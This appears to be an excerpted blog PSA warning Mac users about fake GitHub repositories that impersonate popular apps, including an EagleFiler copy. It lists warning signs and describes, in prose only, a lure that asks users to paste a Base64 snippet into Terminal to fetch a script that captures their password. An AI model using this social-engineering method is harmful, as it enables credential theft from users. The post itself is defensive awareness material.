Fake Mac Apps on GitHub
To be very clear this is not another post of “Breaking news malware exists on the internet” (or it may be depending on how you want to look at it) but I feel like it’s important that I leave a small PSA as I have recently seen an influx of seemingly convincing GitHub repo replicas for decently popular Mac apps. They are so similar that they almost fooled me. Thankfully I quickly spotted some anomalies and I nearly avoided getting infected. Unfortunately these are the sort of red flags I don’t expect an average Joe to know about. Which is why I’m explaining what the malware is, and how to spot it.
[…]
By far the easiest way to avoid this is to simply look for the app online and track down the original developer. This will let you kill 2 birds with one stone by A: Looking for the original source of the app and avoid impostors and B: See if the App or the developer had any previous reputation to begin with.
[…]
The second discrepancy is that the size of the fake app is ridiculously small. For instance the original app is 13mb in size while the fake one is less than 2mb. Now this is not necessarily a red flag (For example some viruses do the opposite and fill their dmg with a lot of useless data to make the file larger than what VirusTotal can handle.) but it’s still important to raise an eye brow for installers with suspiciously small sizes.
I recently had this problem with EagleFiler. Someone had made a decently convincing GitHub repo using the official icon and screenshots and similar marketing text. It ranked highly in Google searches, I guess because GitHub itself has lots of PageRank. The page tried to get users to paste a Base64-encoded snippet into Terminal, which would download and run a shell script that would prompt the user for a password and save it to a cleartext file.
GitHub has ways to report abuse, as well as DMCA and trademark violations, and they got rid of the repo promptly.
Previously:
